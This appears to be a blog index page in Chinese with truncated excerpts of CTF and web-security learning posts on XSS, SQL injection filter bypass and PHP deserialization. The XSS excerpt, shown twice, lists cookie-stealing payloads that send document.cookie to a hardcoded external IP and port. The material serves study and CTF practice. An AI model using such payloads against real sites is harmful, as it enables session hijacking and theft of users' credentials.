XSS我一直想学,今天终于开始啦~ XSS三种利用方式:整理常见的三种XSS攻击类型_Edon-Du的博客-CSDN博客_xss类型 常用payload: 外带 <script> var img=document.createElement("img"); img.src="http://118.31.168.198:39543/"+document.cookie; </script> <script>window.open('http://118.31.168.198:3954…
XSS我一直想学,今天终于开始啦~ XSS三种利用方式:整理常见的三种XSS攻击类型_Edon-Du的博客-CSDN博客_xss类型 常用payload: 外带 <script> var img=document.createElement("img"); img.src="http://118.31.168.198:39543/"+document.cookie; </script> <script>window.open('http://118.31.168.198:3954…
哦对了,这篇文章还没写完,更新中... emmm又是好久没更新了...之后就在这里做个记录吧,有些新的思路可以做些分享 web174 看了一下,应该是有数字或者username=flag就不输出,主要是这个数字的限制有点烦,flag里面肯定是有数字的... 网上的wp很多用的布尔盲注,不过我当时还是想直接注出来,还是有办法的。 参考前面几道题,可以使用to_base64函数,对于一个字符而言,不管是数字还是字母,base64都是没有数字的。 所以,考虑一个一个注出来,利用substring函数依次截取单个字符,然…
emmm终于开始正经地写第一篇wp了!撒花撒花~这场比赛也算是我第一个没爆零的比赛,自己独立做出来了一道(半?),拿到flag也是相当开心~(当然还是比较菜,大佬轻喷)比完赛之后自己又去把差一点做出来的那道题好好整理了一下,梳理了两道题的思路,又有一些新的想法,写个wp跟大家分享分享~ 下面进入正题。 首先需要了解序列化和反序列化的原理以及数组、对象的序列化格式,还有相关的魔术方法,具体可以看这一篇文章:[CTF]PHP反序列化总结_Y4tacker的博客-CSDN博客 一.wowooo 一进…